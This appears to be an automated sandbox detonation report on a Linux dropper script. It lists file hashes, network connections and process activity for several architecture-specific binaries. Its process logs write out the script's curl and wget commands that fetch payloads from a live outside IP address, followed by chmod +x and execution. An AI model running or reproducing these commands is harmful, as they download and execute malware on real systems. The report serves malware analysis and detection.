NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp

Files

/tmp/x86

MD5 c4a3f27654d167d92ac6df60a02b40e2
SHA1 b1707a6ada4a6538e7595cbbdd2cd3b3d2294166
SHA256 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100
SHA512 ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66

/tmp/mips

MD5 038943a024bba0e623ee0fc71c0e9dc4
SHA1 daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b
SHA256 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb
SHA512 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07

/tmp/arc

MD5 154506d20dcd8502b3820a2912b697e9
SHA1 55c207a1c0aeabc6df6d0307f11a03137139d701
SHA256 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c
SHA512 aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112

/tmp/x86_64

MD5 74eff98ceea934700653d0c0620419f8
SHA1 037df252464667dbcdc6f4fde3ff9043a3b76909
SHA256 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89
SHA512 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c

/tmp/mpsl

MD5 eba2a5a74d5beba7b9f903cfe07f9796
SHA1 012af86b452d7e7f82bbd45b5bbef672d2b25c67
SHA256 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea
SHA512 a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be

/tmp/arm

MD5 6b1fc0e45d31470659fe0e295bc63d4e
SHA1 ce54569f5eefe03f56d5df2df3fe4830b0c9f177
SHA256 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22
SHA512 f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea

/tmp/arm5

MD5 fc7db008f770f37ccb16e8d23f9780ae
SHA1 acd2865df9fec74fdafb227ce3136b715bb998b0
SHA256 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db
SHA512 c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c

/tmp/arm6

MD5 d6227412be050807781b974181739db6
SHA1 14d20849fc59a62ed7f713afda3d9dda4cc2c850
SHA256 e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09
SHA512 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76

/tmp/arm7

MD5 d0084c21e35f40b71450406d0298e622
SHA1 f2ce386f6ba9afdb7f95272ab867c913b0802cd9
SHA256 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f
SHA512 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727

/tmp/ppc

MD5 9b27ba0a33c0ecaf4c48bc1fdabf2538
SHA1 d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266
SHA256 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618
SHA512 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea

/tmp/spc

MD5 839129f80935155dff6a2db49753d6a9
SHA1 d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba
SHA256 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457
SHA512 ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3

/tmp/m68k

MD5 e6391e323b334b1257f36bb2fcb34e25
SHA1 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41
SHA256 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728
SHA512 b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958

/tmp/sh4

MD5 f26f51b05d46bea29bcab58abb1a9ec1
SHA1 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf
SHA256 ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466
SHA512 b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-29 19:31

Reported

2024-08-29 19:37

Platform

debian12-mipsel-20240221-en

Max time kernel

56s

Max time network

94s

Command Line

[/tmp/jack5tr.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/mpsl /usr/bin/curl N/A
File opened for modification /tmp/sh4 /usr/bin/curl N/A
File opened for modification /tmp/x86 /usr/bin/curl N/A
File opened for modification /tmp/arc /usr/bin/curl N/A
File opened for modification /tmp/arm /usr/bin/curl N/A
File opened for modification /tmp/m68k /usr/bin/curl N/A
File opened for modification /tmp/arm5 /usr/bin/curl N/A
File opened for modification /tmp/arm6 /usr/bin/curl N/A
File opened for modification /tmp/arm7 /usr/bin/curl N/A
File opened for modification /tmp/spc /usr/bin/curl N/A
File opened for modification /tmp/RUN /tmp/jack5tr.sh N/A
File opened for modification /tmp/x86_64 /usr/bin/curl N/A
File opened for modification /tmp/mips /usr/bin/curl N/A
File opened for modification /tmp/ppc /usr/bin/curl N/A

Processes

/tmp/jack5tr.sh

[/tmp/jack5tr.sh]

/usr/bin/curl

[curl -O http://193.37.59.116/x86]

/usr/bin/cat

[cat x86]

/usr/bin/chmod

[chmod +x jack5tr.sh RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-timedated.service-CdXlhk x86]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x jack5tr.sh mips RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-timedated.service-CdXlhk x86]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/arc]

/usr/bin/cat

[cat arc]

/usr/bin/chmod

[chmod +x arc jack5tr.sh mips RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-timedated.service-CdXlhk x86]

/usr/bin/curl

[curl -O http://193.37.59.116/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x arc jack5tr.sh mips RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-timedated.service-CdXlhk x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/mpsl]

/usr/bin/cat

[cat mpsl]

/usr/bin/chmod

[chmod +x arc jack5tr.sh mips mpsl RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x arc arm jack5tr.sh mips mpsl RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x arc arm arm5 jack5tr.sh mips mpsl RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 jack5tr.sh mips mpsl RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/ppc]

/usr/bin/cat

[cat ppc]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN spc systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/m68k]

/usr/bin/cat

[cat m68k]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN spc systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN sh4 spc systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]

/tmp/RUN

[./RUN]

Network

Country Destination Domain Proto
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
US 1.1.1.1:53 debian12-mipsel-20240221-en-5 udp
US 1.1.1.1:53 debian12-mipsel-20240221-en-5 udp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
US 1.1.1.1:53 debian12-mipsel-20240221-en-5 udp
US 1.1.1.1:53 debian12-mipsel-20240221-en-5 udp

Files

/tmp/x86

MD5 c4a3f27654d167d92ac6df60a02b40e2
SHA1 b1707a6ada4a6538e7595cbbdd2cd3b3d2294166
SHA256 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100
SHA512 ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66

/tmp/mips

MD5 038943a024bba0e623ee0fc71c0e9dc4
SHA1 daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b
SHA256 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb
SHA512 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07

/tmp/arc

MD5 154506d20dcd8502b3820a2912b697e9
SHA1 55c207a1c0aeabc6df6d0307f11a03137139d701
SHA256 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c
SHA512 aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112

/tmp/x86_64

MD5 74eff98ceea934700653d0c0620419f8
SHA1 037df252464667dbcdc6f4fde3ff9043a3b76909
SHA256 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89
SHA512 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c

/tmp/mpsl

MD5 eba2a5a74d5beba7b9f903cfe07f9796
SHA1 012af86b452d7e7f82bbd45b5bbef672d2b25c67
SHA256 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea
SHA512 a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be

/tmp/arm

MD5 6b1fc0e45d31470659fe0e295bc63d4e
SHA1 ce54569f5eefe03f56d5df2df3fe4830b0c9f177
SHA256 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22
SHA512 f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea

/tmp/arm5

MD5 fc7db008f770f37ccb16e8d23f9780ae
SHA1 acd2865df9fec74fdafb227ce3136b715bb998b0
SHA256 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db
SHA512 c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c

/tmp/arm6

MD5 d6227412be050807781b974181739db6
SHA1 14d20849fc59a62ed7f713afda3d9dda4cc2c850
SHA256 e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09
SHA512 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76

/tmp/arm7

MD5 d0084c21e35f40b71450406d0298e622
SHA1 f2ce386f6ba9afdb7f95272ab867c913b0802cd9
SHA256 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f
SHA512 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727

/tmp/ppc

MD5 9b27ba0a33c0ecaf4c48bc1fdabf2538
SHA1 d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266
SHA256 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618
SHA512 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea

/tmp/spc

MD5 839129f80935155dff6a2db49753d6a9
SHA1 d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba
SHA256 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457
SHA512 ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3

/tmp/m68k

MD5 e6391e323b334b1257f36bb2fcb34e25
SHA1 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41
SHA256 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728
SHA512 b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958

/tmp/sh4

MD5 f26f51b05d46bea29bcab58abb1a9ec1
SHA1 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf
SHA256 ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466
SHA512 b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-29 19:31

Reported

2024-08-29 19:36

Platform

debian9-armhf-20240729-en

Max time kernel

14s

Max time network

16s

Command Line

[/tmp/jack5tr.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/mips /usr/bin/curl N/A
File opened for modification /tmp/mpsl /usr/bin/curl N/A
File opened for modification /tmp/arm /usr/bin/curl N/A
File opened for modification /tmp/arc /usr/bin/curl N/A
File opened for modification /tmp/arm6 /usr/bin/curl N/A
File opened for modification /tmp/sh4 /usr/bin/curl N/A
File opened for modification /tmp/RUN /tmp/jack5tr.sh N/A
File opened for modification /tmp/arm5 /usr/bin/curl N/A
File opened for modification /tmp/x86 /usr/bin/curl N/A
File opened for modification /tmp/x86_64 /usr/bin/curl N/A
File opened for modification /tmp/arm7 /usr/bin/curl N/A
File opened for modification /tmp/ppc /usr/bin/curl N/A
File opened for modification /tmp/spc /usr/bin/curl N/A
File opened for modification /tmp/m68k /usr/bin/curl N/A

Processes

/tmp/jack5tr.sh

[/tmp/jack5tr.sh]

/usr/bin/wget

[wget http://193.37.59.116/x86]

/usr/bin/curl

[curl -O http://193.37.59.116/x86]

/bin/cat

[cat x86]

/bin/chmod

[chmod +x jack5tr.sh RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mips]

/usr/bin/curl

[curl -O http://193.37.59.116/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x jack5tr.sh mips RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arc]

/usr/bin/curl

[curl -O http://193.37.59.116/arc]

/bin/cat

[cat arc]

/bin/chmod

[chmod +x arc jack5tr.sh mips RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/x86_64]

/usr/bin/curl

[curl -O http://193.37.59.116/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x arc jack5tr.sh mips RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mpsl]

/usr/bin/curl

[curl -O http://193.37.59.116/mpsl]

/bin/cat

[cat mpsl]

/bin/chmod

[chmod +x arc jack5tr.sh mips mpsl RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm]

/usr/bin/curl

[curl -O http://193.37.59.116/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x arc arm jack5tr.sh mips mpsl RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm5]

/usr/bin/curl

[curl -O http://193.37.59.116/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x arc arm arm5 jack5tr.sh mips mpsl RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm6]

/usr/bin/curl

[curl -O http://193.37.59.116/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x arc arm arm5 arm6 jack5tr.sh mips mpsl RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm7]

/usr/bin/curl

[curl -O http://193.37.59.116/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/ppc]

/usr/bin/curl

[curl -O http://193.37.59.116/ppc]

/bin/cat

[cat ppc]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/spc]

/usr/bin/curl

[curl -O http://193.37.59.116/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN spc systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/m68k]

/usr/bin/curl

[curl -O http://193.37.59.116/m68k]

/bin/cat

[cat m68k]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN spc systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/sh4]

/usr/bin/curl

[curl -O http://193.37.59.116/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN sh4 spc systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]

/tmp/RUN

[./RUN]

Network

Country Destination Domain Proto
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp

Files

/tmp/x86

MD5 c4a3f27654d167d92ac6df60a02b40e2
SHA1 b1707a6ada4a6538e7595cbbdd2cd3b3d2294166
SHA256 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100
SHA512 ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66

/tmp/mips

MD5 038943a024bba0e623ee0fc71c0e9dc4
SHA1 daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b
SHA256 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb
SHA512 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07

/tmp/arc

MD5 154506d20dcd8502b3820a2912b697e9
SHA1 55c207a1c0aeabc6df6d0307f11a03137139d701
SHA256 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c
SHA512 aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112

/tmp/x86_64

MD5 74eff98ceea934700653d0c0620419f8
SHA1 037df252464667dbcdc6f4fde3ff9043a3b76909
SHA256 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89
